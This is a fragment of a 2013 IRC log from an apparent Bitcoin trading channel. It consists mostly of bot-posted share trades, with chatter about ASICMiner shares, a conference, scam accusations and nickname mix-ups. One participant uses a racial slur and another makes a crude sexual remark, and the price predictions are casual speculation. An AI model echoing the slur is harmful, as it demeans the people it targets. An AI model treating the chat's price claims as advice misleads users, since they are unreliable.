= 0.3888 BTC [+] May 21 16:41:25 [BTCTC] [TAT.ASICMINER] 61 @ 0.02592 = 1.5811 BTC [+] May 21 16:45:11 Same here May 21 16:45:31 [BTCTC] [TAT.ASICMINER] 23 @ 0.02594 = 0.5966 BTC [+] May 21 16:46:39 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [-] May 21 16:48:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.02504 BTC [-] May 21 16:49:00 [BTCTC] [TAT.ASICMINER] 5 @ 0.025031 = 0.1252 BTC [-] May 21 16:52:00 [BTCTC] [ASICMINER-PT] 1 @ 2.548999 BTC [-] May 21 16:54:31 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [+] May 21 16:56:27 [BTCTC] [ASICMINER-PT] 2 @ 2.549 = 5.098 BTC [+] May 21 16:58:02 [BTCTC] [ASICMINER-PT] 1 @ 2.5135 BTC [-] May 21 16:58:18 [BTCTC] [ASICMINER-PT] 1 @ 2.5135 BTC [-] May 21 16:58:57 [BTCTC] [TAT.ASICMINER] 5 @ 0.025909 = 0.1295 BTC [+] May 21 16:59:03 [BTCTC] [TAT.ASICMINER] 5 @ 0.025003 = 0.125 BTC [-] May 21 16:59:07 [BTCTC] [TAT.ASICMINER] 8 @ 0.025002 = 0.2 BTC [-] May 21 16:59:18 [BTCTC] [TAT.ASICMINER] 51 @ 0.025 = 1.275 BTC [-] May 21 17:00:01 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [+] May 21 17:00:03 [HAVELOCK] [SDICE] 10 @ 0.244 = 2.44 BTC [+] May 21 17:00:03 [HAVELOCK] [SDICE] 2 @ 0.2497 = 0.4994 BTC [+] May 21 17:00:04 [HAVELOCK] [SDICE] 3 @ 0.24979999 = 0.7494 BTC [+] May 21 17:00:06 [HAVELOCK] [SDICE] 62 @ 0.2499 = 15.4938 BTC [+] May 21 17:00:07 [HAVELOCK] [SDICE] 30 @ 0.25 = 7.5 BTC [+] May 21 17:00:08 [HAVELOCK] [SDICE] 28 @ 0.25 = 7 BTC [+] May 21 17:01:08 [BTCTC] [TAT.ASICMINER] 5 @ 0.02591 = 0.1296 BTC [+] May 21 17:02:20 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [+] May 21 17:06:34 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [+] May 21 17:07:29 [BTCTC] [ASICMINER-PT] 1 @ 2.548999 BTC [-] May 21 17:14:28 [MPEX] [S.MPOE] 8386 @ 0.00066158 = 5.548 BTC [+] May 21 17:14:42 [BTCTC] [COGNITIVE] 1 @ 0.249981 BTC [+] May 21 17:14:47 [BTCTC] [COGNITIVE] 10 @ 0.25 = 2.5 BTC [+] May 21 17:18:02 [HAVELOCK] [ASICM] 154 @ 0.0258 = 3.9732 BTC [-] May 21 17:21:14 [BTCTC] [ASICMINER-PT] 1 @ 2.513501 BTC [-] May 21 17:21:41 [BTCTC] [ASICMINER-PT] 1 @ 2.5135 BTC [-] May 21 17:22:11 [BTCTC] [TAT.ASICMINER] 15 @ 0.02509 = 0.3764 BTC [-] May 21 17:22:23 [BTCTC] [ASICMINER-PT] 1 @ 2.512 BTC [-] May 21 17:22:28 [BTCTC] [TAT.ASICMINER] 5 @ 0.025005 = 0.125 BTC [-] May 21 17:22:36 [BTCTC] [TAT.ASICMINER] 5 @ 0.025004 = 0.125 BTC [-] May 21 17:22:41 [BTCTC] [TAT.ASICMINER] 10 @ 0.025 = 0.25 BTC [-] May 21 17:22:46 [BTCTC] [TAT.ASICMINER] 114 @ 0.025 = 2.85 BTC [-] May 21 17:22:54 [BTCTC] [TAT.ASICMINER] 9 @ 0.025 = 0.225 BTC [-] May 21 17:22:56 [BTCTC] [ASICMINER-PT] 1 @ 2.506 BTC [-] May 21 17:23:00 [BTCTC] [TAT.ASICMINER] 3 @ 0.025 = 0.075 BTC [-] May 21 17:23:05 [BTCTC] [TAT.ASICMINER] 39 @ 0.0249 = 0.9711 BTC [-] May 21 17:23:24 [BTCTC] [ASICMINER-PT] 1 @ 2.502 BTC [-] May 21 17:23:45 [BTCTC] [ASICMINER-PT] 1 @ 2.450001 BTC [-] May 21 17:24:02 [HAVELOCK] [ASICM] 17 @ 0.0258 = 0.4386 BTC [-] May 21 17:24:03 [HAVELOCK] [ASICM] 39 @ 0.0257 = 1.0023 BTC [-] May 21 17:24:04 [HAVELOCK] [ASICM] 20 @ 0.0256 = 0.512 BTC [-] May 21 17:24:06 [HAVELOCK] [ASICM] 27 @ 0.02551001 = 0.6888 BTC [-] May 21 17:24:07 [HAVELOCK] [ASICM] 7 @ 0.025 = 0.175 BTC [-] May 21 17:24:09 [HAVELOCK] [ASICM] 5 @ 0.025 = 0.125 BTC [-] May 21 17:24:10 [BTCTC] [ASICMINER-PT] 1 @ 2.451 BTC [+] May 21 17:25:31 [BTCTC] [ASICMINER-PT] 1 @ 2.451 BTC [+] May 21 17:27:11 [BTCTC] [TAT.ASICMINER] 10 @ 0.024901 = 0.249 BTC [+] May 21 17:27:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.025898 BTC [+] May 21 17:27:16 [BTCTC] [COGNITIVE] 1 @ 0.25 BTC [+] May 21 17:27:18 [BTCTC] [TAT.ASICMINER] 51 @ 0.0249 = 1.2699 BTC [-] May 21 17:28:01 [HAVELOCK] [ASICM] 4 @ 0.025 = 0.1 BTC [-] May 21 17:28:02 [HAVELOCK] [ASICM] 20 @ 0.0247 = 0.494 BTC [-] May 21 17:28:48 [BTCTC] [TAT.ASICMINER] 14 @ 0.025898 = 0.3626 BTC [+] May 21 17:29:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.025899 BTC [+] May 21 17:29:54 [BTCTC] [TAT.ASICMINER] 88 @ 0.025898 = 2.279 BTC [-] May 21 17:29:57 [BTCTC] [TAT.ASICMINER] 10 @ 0.0249 = 0.249 BTC [-] May 21 17:30:22 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 21 17:31:50 [BTCTC] [RSM] 2 @ 0.011 = 0.022 BTC [+] May 21 17:35:47 [BTCTC] [ASICMINER-PT] 1 @ 2.451 BTC [-] May 21 17:35:52 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [-] May 21 17:35:59 [BTCTC] [ASICMINER-PT] 1 @ 2.425 BTC [-] May 21 17:37:01 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [+] May 21 17:37:04 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [+] May 21 17:37:20 [BTCTC] [S.DICE-PT] 16 @ 0.00338 = 0.0541 BTC [+] May 21 17:37:25 [BTCTC] [BASIC-MINING] 40 @ 0.52 = 20.8 BTC [+] May 21 17:39:48 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [+] May 21 17:40:09 mircea_popescu deposit flush please May 21 17:44:27 [BTCTC] [ASICMINER-PT] 3 @ 2.442 = 7.326 BTC [-] May 21 17:44:56 [BTCTC] [COG.F] 1 @ 2.5 BTC [+] May 21 17:46:26 [MPEX] [S.MPOE] 7027 @ 0.00066158 = 4.6489 BTC [+] May 21 17:46:28 [MPEX] [S.MPOE] 10273 @ 0.00066193 = 6.8 BTC [+] May 21 17:46:36 WTS Asicminer Shares! Send me offers :) May 21 17:50:02 [BTCTC] [TAT.ASICMINER] 4 @ 0.025899 = 0.1036 BTC [+] May 21 17:50:13 [BTCTC] [TAT.ASICMINER] 6 @ 0.025899 = 0.1554 BTC [+] May 21 17:52:02 [HAVELOCK] [ASICM] 15 @ 0.0257 = 0.3855 BTC [+] May 21 17:55:24 WTS 2500 Asicminer Shares! Pm me with offers (can be of smaller amount of shares) May 21 17:59:01 [HAVELOCK] [HIM] 1 @ 2.0249 BTC [-] May 21 18:04:56 I'd pay like 1250 BTC at most for the lot. I want to short. May 21 18:05:20 [BTCTC] [RSM] 1 @ 0.0121 BTC [+] May 21 18:06:41 [BTCTC] [S.DICE-PT] 200 @ 0.00338 = 0.676 BTC [+] May 21 18:13:02 [BTCTC] [RSM] 1 @ 0.0121 BTC [+] May 21 18:15:02 [HAVELOCK] [ASICM] 17 @ 0.0247 = 0.4199 BTC [-] May 21 18:15:26 [BTCTC] [BTC-BOND] 9 @ 0.01 = 0.09 BTC [-] May 21 18:17:02 [HAVELOCK] [ASICM] 15 @ 0.0254 = 0.381 BTC [+] May 21 18:22:34 bdk_kluge hey man, hows it going? May 21 18:23:01 [HAVELOCK] [HIM] 1 @ 2.01 BTC [-] May 21 18:24:00 Hey goat :) May 21 18:24:13 hey DeadT how was Cali? May 21 18:25:01 It was great a lot of cool people May 21 18:25:14 Very buisiness and financial compared to last years conference May 21 18:25:22 a lot of hedge/investment funds and investors May 21 18:25:34 Too bad i only stayed for 4 days May 21 18:25:42 id like to have gone May 21 18:25:56 but yeas, it seems we are moving up fast May 21 18:26:01 btc is not going away May 21 18:26:06 yea, would have been nice meeting you. It was great to finally put some faces on all the names May 21 18:26:22 yeah, meeting btc people in person is really good May 21 18:26:29 Indeed, I think within 6-9 months we will see the infrastructure and the Bitcoin buisinesses taking a major leap forward May 21 18:27:06 :) May 21 18:27:32 that would be epic May 21 18:27:40 price can only go up May 21 18:27:55 how much AM do you have left to sell? May 21 18:28:02 [HAVELOCK] [ASICM] 200 @ 0.025 = 5 BTC [-] May 21 18:28:10 you are holding the price down! we only reached a high of 3.3 May 21 18:28:11 [BTCTC] [TAT.ASICMINER] 7 @ 0.025898 = 0.1813 BTC [-] May 21 18:28:39 [BTCTC] [BASIC-MINING] 1 @ 0.52 BTC [+] May 21 18:29:05 that 3.3 was some kind of glitch May 21 18:29:12 no May 21 18:29:16 no? May 21 18:29:21 it was too high May 21 18:29:25 but that happens May 21 18:29:28 top blow off May 21 18:29:35 no i mean it was literally a glitch May 21 18:29:40 as in there were lower asks May 21 18:29:41 [BTCTC] [S.DICE-PT] 6 @ 0.00338 = 0.0203 BTC [+] May 21 18:29:42 im not so sure May 21 18:29:42 when it fired May 21 18:29:52 It was a glitch or mistake May 21 18:30:02 asks were lower May 21 18:30:10 I looked right away May 21 18:30:16 i had asks up at under 3 May 21 18:30:36 yeah, there was plenty of depth May 21 18:30:46 I have about 1.8k shares left to sell May 21 18:30:58 hmm May 21 18:31:03 I think that right about 2.4-2.5 is as high as you could argue for May 21 18:31:07 any higher is overpricing May 21 18:31:12 hope you get rid of them soon so we can go to the moon :)] May 21 18:31:20 my opinion based on the current stats May 21 18:31:30 [BTCTC] [TAT.ASICMINER] 3 @ 0.025898 = 0.0777 BTC [-] May 21 18:31:30 i have no problem with selling too high May 21 18:31:32 Yea, I am going to try to sell them all today May 21 18:31:37 and pay out my investors tomorrow :) May 21 18:31:47 We will probably see a 20% profit, which was very suprising :D May 21 18:31:58 yeah, im glad you pulled out of that okay May 21 18:33:51 with this new market rating system, how do we see who rates us? May 21 18:34:01 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [-] May 21 18:34:02 Yea it looked a bit dark when GLBSE went down and there were a lot of defaults, but thanks to Friedcat I was able to keep the investors happy in the end ^^ May 21 18:34:13 I think there´s a list May 21 18:34:22 if you click on your trust May 21 18:34:36 i jumped ship as soon as you starting working with matthew wright and his products, i knew shit was going to go bad :/ May 21 18:35:15 ahh i see it May 21 18:35:20 [BTCTC] [ASICMINER-PT] 1 @ 2.496996 BTC [+] May 21 18:35:21 Yea... I have definitly done some mistakes, several in fact May 21 18:35:30 no feed back lol, with all the deals i have made May 21 18:35:31 I have learnt my lesson though May 21 18:35:38 we all get scammed May 21 18:35:42 [BTCTC] [BASIC-MINING] 1 @ 0.52 BTC [+] May 21 18:35:46 i just got scammed like 50 times before you :) May 21 18:36:07 Yea, in a reputation/trust based system it is a lesson we all must learn May 21 18:36:29 [BTCTC] [BASIC-MINING] 15 @ 0.53 = 7.95 BTC [+] May 21 18:42:25 does this trust thing only work in market place threads or something? May 21 18:43:01 [HAVELOCK] [ASICM] 200 @ 0.025 = 5 BTC [-] May 21 18:46:16 [BTCTC] [COGNITIVE] 60 @ 0.25 = 15 BTC [+] May 21 18:46:42 [MPEX] [S.MPOE] 1500 @ 0.0006585 = 0.9878 BTC [-] May 21 18:46:44 [MPEX] [S.MPOE] 5320 @ 0.00065841 = 3.5027 BTC [-] May 21 18:46:52 [MPEX] [S.MPOE] 4280 @ 0.00065752 = 2.8142 BTC [-] May 21 18:47:01 [HAVELOCK] [ASICM] 40 @ 0.025 = 1 BTC [-] May 21 18:48:20 [BTCTC] [COG.F] 6 @ 2.5 = 15 BTC [+] May 21 18:51:48 [MPEX] [S.DICE] 1000 @ 0.00251997 = 2.52 BTC [+] May 21 18:53:17 [BTCTC] [BASIC-MINING] 33 @ 0.53 = 17.49 BTC [+] May 21 18:55:21 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] May 21 18:58:03 [BTCTC] [BASIC-MINING] 2 @ 0.53 = 1.06 BTC [+] May 21 19:02:38 http://www.theverge.com/2013/5/21/4348064/why-wont-bitcoin-die?utm_source=feedly May 21 19:02:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.025898 BTC [-] May 21 19:03:01 [HAVELOCK] [ASICM] 100 @ 0.02471 = 2.471 BTC [-] May 21 19:03:16 [BTCTC] [B.YABMC] 8 @ 0.0142 = 0.1136 BTC [+] May 21 19:04:01 [HAVELOCK] [ASICM] 7 @ 0.02471 = 0.173 BTC [-] May 21 19:04:15 Verge reporter girl in comment section regulating too May 21 19:04:41 [BTCTC] [COG.F] 4 @ 2.5 = 10 BTC [+] May 21 19:05:01 [HAVELOCK] [SDICE] 2 @ 0.25 = 0.5 BTC [+] May 21 19:05:36 WTS 1700 Asicminer Shares! Pm me with offers (can be of smaller amount of shares) May 21 19:06:02 [HAVELOCK] [ASICM] 2 @ 0.02471 = 0.0494 BTC [-] May 21 19:06:06 [BTCTC] [TAT.ASICMINER] 4 @ 0.025898 = 0.1036 BTC [-] May 21 19:06:13 [BTCTC] [TAT.ASICMINER] 11 @ 0.0259 = 0.2849 BTC [+] May 21 19:07:01 [HAVELOCK] [ASICM] 18 @ 0.0247 = 0.4446 BTC [-] May 21 19:07:32 DeadT i bid 1.5 BTC each :) May 21 19:08:12 TAT that is a new photo as that coin is new May 21 19:08:47 That looks like chocolate coins May 21 19:09:19 that photo of that guy, thats 5 btc coins and a 25 btc peice right? May 21 19:09:35 not the gold and silver ones right? May 21 19:10:45 the gold ones are chocolate I think, they have a wrapper edge May 21 19:11:01 [HAVELOCK] [ASICM] 80 @ 0.0247 = 1.976 BTC [-] May 21 19:11:26 [BTCTC] [S.BBET-PT] 1 @ 0.003011 BTC [+] May 21 19:12:02 [HAVELOCK] [ASICM] 81 @ 0.0246 = 1.9926 BTC [-] May 21 19:12:52 i mean with the guy and the flask with the necklace May 21 19:13:12 [BTCTC] [PAJKA.BOND] 5 @ 0.108 = 0.54 BTC [-] May 21 19:13:26 lol May 21 19:13:32 I just saw him May 21 19:15:01 [HAVELOCK] [ASICM] 26 @ 0.024501 = 0.637 BTC [-] May 21 19:15:48 Chaang-Noi: don't you ever sleep? May 21 19:16:09 https://bitcointalk.org/index.php?topic=211653.0;topicseen May 21 19:16:16 [MPEX] [S.MPOE] 1220 @ 0.00065752 = 0.8022 BTC [-] May 21 19:16:17 [MPEX] [S.MPOE] 4230 @ 0.00065751 = 2.7813 BTC [-] May 21 19:16:29 [BTCTC] [TAT.ASICMINER] 20 @ 0.0255 = 0.51 BTC [-] May 21 19:16:50 i will sleep when i am dead May 21 19:18:09 I am DeaD, ... that was a bad pun but I had to go for it May 21 19:21:58 http://www.overlandparkjeepdodge.net/used/Chevrolet/2009-Chevrolet-Corvette-699cda880a0a00de00a1674886a47580.htm should i buy this with btc? May 21 19:22:02 [HAVELOCK] [ASICM] 100 @ 0.0245 = 2.45 BTC [-] May 21 19:22:43 Regarding the neckless May 21 19:22:45 it is a 25 in them iddle May 21 19:22:50 then 5 on the side May 21 19:22:58 okay cool May 21 19:23:00 The guy had his booth right next to mine :) nice guy! May 21 19:23:04 im going to make one with 1000 btc May 21 19:23:51 Chaang-Noi: whatever happened between you and GLBSE eventually? May 21 19:24:23 [MPEX] [S.MPOE] 6900 @ 0.00066443 = 4.5846 BTC [+] May 21 19:24:24 the delisted me May 21 19:24:30 they* May 21 19:25:29 you ever get your coins back? May 21 19:27:01 [HAVELOCK] [HIM] 7 @ 2.0479 = 14.3353 BTC [+] May 21 19:29:02 [HAVELOCK] [HIM] 5 @ 2.048 = 10.24 BTC [+] May 21 19:30:08 i got some coins back May 21 19:30:21 assets not so much May 21 19:31:01 [HAVELOCK] [ASICM] 54 @ 0.024501 = 1.3231 BTC [+] May 21 19:31:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.0255 BTC [-] May 21 19:31:26 and he got the scammer tag May 21 19:31:55 [BTCTC] [TAT.ASICMINER] 85 @ 0.0255 = 2.1675 BTC [-] May 21 19:31:56 for a bs reason May 21 19:32:01 but yes May 21 19:33:11 [BTCTC] [ASICMINER-PT] 1 @ 2.5452 BTC [+] May 21 19:33:15 [BTCTC] [ASICMINER-PT] 1 @ 2.5455 BTC [+] May 21 19:33:19 [BTCTC] [ASICMINER-PT] 1 @ 2.5485 BTC [+] May 21 19:33:21 [BTCTC] [ASICMINER-PT] 2 @ 2.55 = 5.1 BTC [+] May 21 19:33:21 ;;nethash May 21 19:33:22 79710.0663464 May 21 19:37:52 [BTCTC] [TAT.ASICMINER] 4 @ 0.0255 = 0.102 BTC [-] May 21 19:38:02 [HAVELOCK] [ASICM] 192 @ 0.0245 = 4.704 BTC [-] May 21 19:38:40 [BTCTC] [BASIC-MINING] 1 @ 0.54 BTC [+] May 21 19:41:01 [HAVELOCK] [ASICM] 78 @ 0.0249 = 1.9422 BTC [+] May 21 19:44:01 [HAVELOCK] [KCIM] 1 @ 1.4046 BTC [+] May 21 19:45:02 [HAVELOCK] [SDICE] 1 @ 0.24999999 BTC [-] May 21 19:46:00 [HAVELOCK] [ASICM] 20 @ 0.025 = 0.5 BTC [+] May 21 19:46:02 [HAVELOCK] [ASICM] 2 @ 0.025 = 0.05 BTC [+] May 21 19:47:07 [BTCTC] [TAT.ASICMINER] 31 @ 0.0254 = 0.7874 BTC [-] May 21 19:47:14 Haha May 21 19:47:29 My mum is annoyed I bought BTC. May 21 19:47:49 how old are you? May 21 19:47:54 [BTCTC] [ASICMINER-PT] 1 @ 2.59 BTC [+] May 21 19:48:01 [HAVELOCK] [VTX] 1 @ 0.4151 BTC [-] May 21 19:48:12 Thing is, she'll find the guardian says it's a waste of time and then take that to be the word of the lord. May 21 19:48:15 12 May 21 19:48:49 go outside and play May 21 19:48:55 lol May 21 19:49:00 No May 21 19:49:01 [HAVELOCK] [HIM] 2 @ 2.048 = 4.096 BTC [+] May 21 19:49:10 Why would I? May 21 19:49:12 I'm gonna count to 3 May 21 19:49:18 maybe she likes litecoin more May 21 19:49:20 You better listen to your Uglux May 21 19:49:24 just 2.5 min blocks ya know May 21 19:49:30 or something May 21 19:49:53 1... May 21 19:50:05 1 min blocks? May 21 19:50:10 2... May 21 19:50:13 i dunno honestly May 21 19:50:29 don't make me say 3! May 21 19:50:42 :) May 21 19:50:51 3 min blocks?! May 21 19:51:01 [HAVELOCK] [ASICM] 16 @ 0.025 = 0.4 BTC [+] May 21 19:51:13 ;;slap Willdude123 May 21 19:51:30 ;;slap Willdude123 May 21 19:51:37 ;;slap Willdude123 May 21 19:51:42 Now go to your room May 21 19:52:02 calm down everyone May 21 19:52:32 wait til your father gets home May 21 19:52:39 ok i'm done May 21 19:52:42 :) May 21 19:53:06 [BTCTC] [ASICMINER-PT] 1 @ 2.596997 BTC [+] May 21 19:53:32 [BTCTC] [TAT.ASICMINER] 344 @ 0.0255 = 8.772 BTC [+] May 21 19:53:38 willdude has a history even if 12 May 21 19:53:39 http://cdn.lastangryfan.com/wp-content/uploads/citizen-kane-clapping.gif May 21 19:53:53 he is not just a kid May 21 19:54:27 hey check it out https://bitcointalk.org/index.php?topic=212085.0 May 21 19:54:35 USB miners come with fancy cases May 21 19:54:38 willdude123 ignore the ignorant haters May 21 19:54:45 sweet May 21 19:55:03 [BTCTC] [RSM] 11 @ 0.012799 = 0.1408 BTC [+] May 21 19:55:39 Where can these USB miners be bought? May 21 19:56:01 [HAVELOCK] [HIM] 1 @ 2.146 BTC [+] May 21 19:56:03 [MPEX] [S.MPOE] 1180 @ 0.0006646 = 0.7842 BTC [+] May 21 19:56:07 they cost 2BTC May 21 19:56:38 Goat, I don't have a problem with Willdude123, May 21 19:56:39 not for long May 21 19:56:52 but it does make me feel awkward to have a 12yo in the room May 21 19:57:04 agree May 21 19:57:11 but he got here and has the rep to be here May 21 19:57:18 rep? May 21 19:57:25 yeah May 21 19:57:31 what did i miss? May 21 19:57:48 [BTCTC] [TAT.ASICMINER] 12 @ 0.0255 = 0.306 BTC [+] May 21 19:57:57 [BTCTC] [ASICMINER-PT] 1 @ 2.59499 BTC [-] May 21 19:58:01 he is known outside the btc world May 21 19:58:14 and now wants to learn May 21 19:58:14 Did anyone have time to see the scam thread against me? May 21 19:58:19 no May 21 19:58:24 nope May 21 19:58:24 did you scam? May 21 19:58:29 Haha May 21 19:58:36 Apparently someone has started a DEADTERRA IS A SCAMMER in the security section. I got a email about it as I follow the forum May 21 19:58:36 2BTC. May 21 19:58:39 Nah. May 21 19:58:40 but before I could go to it May 21 19:58:41 Willdude123, who are you? Jaden Smith? May 21 19:58:42 it was deleted May 21 19:58:42 [BTCTC] [TAT.ASICMINER] 43 @ 0.0255 = 1.0965 BTC [+] May 21 19:58:46 link, please deadt May 21 19:58:50 oh May 21 19:58:52 Jaden Smith is? May 21 19:58:57 Will Smith's kid May 21 19:59:04 "A new topic, 'DEADTERRA IS A SCAMMER', has been made on a board you are watching. May 21 19:59:04 You can see it at May 21 19:59:04 https://bitcointalk.org/index.php?topic=211792.new#new May 21 19:59:05 " May 21 19:59:29 I wouldn't be 12 if I was. May 21 19:59:32 link fail May 21 19:59:40 Would have like to know who posted it so that I could talk to them May 21 19:59:45 Yea, the thread was deleted I guess May 21 19:59:46 seems he knows how to use wikipedia May 21 19:59:52 hehe May 21 20:00:05 +1 rep May 21 20:00:13 Haha May 21 20:00:14 O_o May 21 20:00:16 [BTCTC] [ASICMINER-PT] 1 @ 2.521102 BTC [-] May 21 20:00:21 [BTCTC] [ASICMINER-PT] 1 @ 2.521101 BTC [-] May 21 20:00:29 [BTCTC] [ASICMINER-PT] 1 @ 2.503 BTC [-] May 21 20:00:34 I got into a bit of trouble on WP, not my fault though. May 21 20:00:43 [BTCTC] [ASICMINER-PT] 1 @ 2.5021 BTC [-] May 21 20:00:49 you are 12, getting into trouble is fine May 21 20:00:51 Jaden Smith always looks like he's trying to make a sexy face into the mirror May 21 20:01:14 like the sun is always in his face May 21 20:02:07 If anyone feels sympathetic towards me due to TAT's teasing: 1ABtKfxwVDE9j2j4zQGvQdXtsDkEfYNYie May 21 20:02:10 ;-) May 21 20:02:14 Jk May 21 20:02:15 -1 rep May 21 20:02:24 in nigger speak/slang is a "chopper" a fully auto rifle? May 21 20:02:30 no he wants to be a klingon May 21 20:02:42 will dont beg//// May 21 20:02:56 K May 21 20:02:57 Haha May 21 20:03:07 that wont play May 21 20:03:24 only with supernodes lol May 21 20:04:48 yes Goat, May 21 20:04:55 chopper is an AK47 May 21 20:04:56 Chaang-Noi: I think the word is "GAT" short for gatling gun. but that might be old slang. May 21 20:04:57 i am blocked from reading mps blog, not that i would anywaty May 21 20:05:02 [HAVELOCK] [ASICM] 2 @ 0.02549 = 0.051 BTC [+] May 21 20:05:06 like goat, only without the A. May 21 20:05:18 http://www.youtube.com/watch?v=3fumBcKC6RE&list=RD02NBcErcuXZ8E "i got a chopper in the car" May 21 20:05:52 if chopper is not a gun, wtf is it? he cant have a heli in his car... May 21 20:06:35 [BTCTC] [B.YABMC] 18 @ 0.0142 = 0.2556 BTC [+] May 21 20:06:36 but a black rapped saying he has a gun in his car, is that cool now? May 21 20:06:42 what else could it be? May 21 20:07:01 depends on your perception of cool May 21 20:07:04 [BTCTC] [B.YABMC] 16 @ 0.015 = 0.24 BTC [+] May 21 20:07:33 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19 BTC [-] May 21 20:07:39 me either May 21 20:07:47 too hard to look at May 21 20:07:56 lol Chaang-Noi May 21 20:08:38 that guy is the definition of idiot May 21 20:08:51 but he has more money than all of us:) May 21 20:08:56 and all his raps are like "I'm make mad dough. baker. Swimming in money. Laker" May 21 20:08:57 etc May 21 20:09:03 many idiots do Chaang-Noi May 21 20:09:05 and i know he gets better pussy May 21 20:09:23 i just want to understand the slang May 21 20:09:29 its a gun May 21 20:09:52 i assumed a fully auto cuz the name May 21 20:09:58 AK47 May 21 20:10:02 but dont know the slang May 21 20:10:07 http://www.forbes.com/sites/andygreenberg/2013/05/20/25-gun-created-with-cheap-3d-printer-fires-nine-shots-video/ May 21 20:10:18 i hate linking forbes May 21 20:10:19 if its legal it cant be a fully auto ak47 May 21 20:10:20 they should call it May 21 20:10:23 9 Lives May 21 20:10:58 or May 21 20:11:01 The Black Cat May 21 20:11:08 etc May 21 20:11:10 Chaang-Noi: could be http://www.westcoasthogs.com/images/DSC01571_opt.jpg or https://encrypted-tbn2.gstatic.com/images?q=tbn:ANd9GcRlugcOjN3O07NPevdXu0vMsWCo6WPMOoWQYDeWMyFxcn_TjQD9Ag May 21 20:11:35 lol May 21 20:11:36 lol kako May 21 20:11:51 its not clear tbh. May 21 20:12:02 [HAVELOCK] [VTX] 2 @ 0.415 = 0.83 BTC [-] May 21 20:13:58 GOAT , did you have anything to do with this ? http://www.youtube.com/watch?v=yObi65xxF7o May 21 20:14:15 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [-] May 21 20:14:30 AM better watch out! https://bitcointalk.org/index.php?topic=197319.msg2053180#msg2053180 May 21 20:15:00 [BTCTC] [RSM] 5 @ 0.011 = 0.055 BTC [-] May 21 20:16:01 [HAVELOCK] [ASICM] 26 @ 0.0254999 = 0.663 BTC [+] May 21 20:16:04 [BTCTC] [ASICMINER-PT] 1 @ 2.549997 BTC [+] May 21 20:16:35 [BTCTC] [TAT.ASICMINER] 3 @ 0.0255 = 0.0765 BTC [+] May 21 20:16:57 GOAT , did you have anything to do with this ? http://www.youtube.com/watch?v=yObi65xxF7o yes, that is me May 21 20:19:01 [HAVELOCK] [ASICM] 164 @ 0.0255 = 4.182 BTC [+] May 21 20:19:48 is not bad May 21 20:19:51 [MPEX] [S.MPOE] 15900 @ 0.00065784 = 10.4597 BTC [-] May 21 20:20:01 far better that what wayne did May 21 20:20:01 [HAVELOCK] [ASICM] 200 @ 0.0255 = 5.1 BTC [+] May 21 20:20:04 thx May 21 20:21:01 [HAVELOCK] [HIM] 1 @ 2.2499 BTC [+] May 21 20:21:07 2.549997 for asicminer? gosh May 21 20:21:30 i know still undervalued May 21 20:21:41 what should it be? in your opinion May 21 20:21:53 3.5 May 21 20:21:58 why? May 21 20:22:01 [HAVELOCK] [VTX] 1 @ 0.4296 BTC [+] May 21 20:22:20 cuz bitcoin May 21 20:23:18 [BTCTC] [COG.F] 3 @ 2.5 = 7.5 BTC [+] May 21 20:24:01 [HAVELOCK] [ASICM] 500 @ 0.028 = 14 BTC [+] May 21 20:25:27 ;;ident deadweasel May 21 20:25:27 Nick 'deadweasel', with hostmask 'deadweasel!~deadwease@unaffiliated/deadweasel', is identified as user DeadWeasel, with GPG key id 6D206C24463BEC07, key fingerprint 5285832B5B6CD92F43E87FCF6D206C24463BEC07, and bitcoin address None May 21 20:25:53 deadweasel is someone trying to scam? May 21 20:26:09 i asked DT to pm me on forums for confirmation May 21 20:26:16 that's me May 21 20:26:22 and go tlinks to escrow services May 21 20:26:31 just trying to show what I'd come up with so far May 21 20:26:46 thrucoin.com has nice service front-end May 21 20:26:52 huh? May 21 20:30:02 I think someone is impersonating deadterra May 21 20:30:07 ThickAsThieves, were we not talking about escrow yesterday? May 21 20:30:17 I wonder what tomorrow's divs will be like. May 21 20:30:18 I was just PMing you May 21 20:30:20 who are you? May 21 20:30:33 nevermind, forget it May 21 20:30:38 maybe I hallucinated the whole thing. May 21 20:30:43 it's certainly possible. May 21 20:32:02 [BTCTC] [BITVPS] 315 @ 0.000697 = 0.2196 BTC [+] May 21 20:33:02 [HAVELOCK] [ASICM] 40 @ 0.02799999 = 1.12 BTC [-] May 21 20:34:01 [HAVELOCK] [ASICM] 2 @ 0.02799999 = 0.056 BTC [-] May 21 20:34:28 oh shit May 21 20:34:37 :) May 21 20:35:05 got yer deads mixed up? May 21 20:35:06 sorry deadweasel May 21 20:35:09 lol May 21 20:35:10 no worries May 21 20:35:15 i slept like 4 hrs May 21 20:35:25 [BTCTC] [BITVPS] 3 @ 0.000697 = 0.0021 BTC [+] May 21 20:35:30 i get about that a week May 21 20:35:43 if I'd known there were so many Dead* nicks I would have chosen 'flibbertygibbet' as an IRC user name. May 21 20:36:51 ;;ident DeaDTerra May 21 20:36:51 Nick 'DeaDTerra', with hostmask 'DeaDTerra!~DeaDTerra@se1x.mullvad.net', is identified as user DeaDTerra, with GPG key id A66A3733FC94B88F, key fingerprint 50D437162E449CAD98B9922AA66A3733FC94B88F, and bitcoin address 1G3R6eo4PYM3ZHRyKJofqo9ZJwRswzk3PR May 21 20:37:01 [HAVELOCK] [ASICM] 18 @ 0.028 = 0.504 BTC [+] May 21 20:38:01 [HAVELOCK] [SDICE] 2 @ 0.24999999 = 0.5 BTC [-] May 21 20:38:54 I was the original dead person xD May 21 20:39:50 yes, and Dead Earth has a much better ring to it. May 21 20:40:01 [HAVELOCK] [ASICM] 3 @ 0.028 = 0.084 BTC [+] May 21 20:40:03 with your latin twist May 21 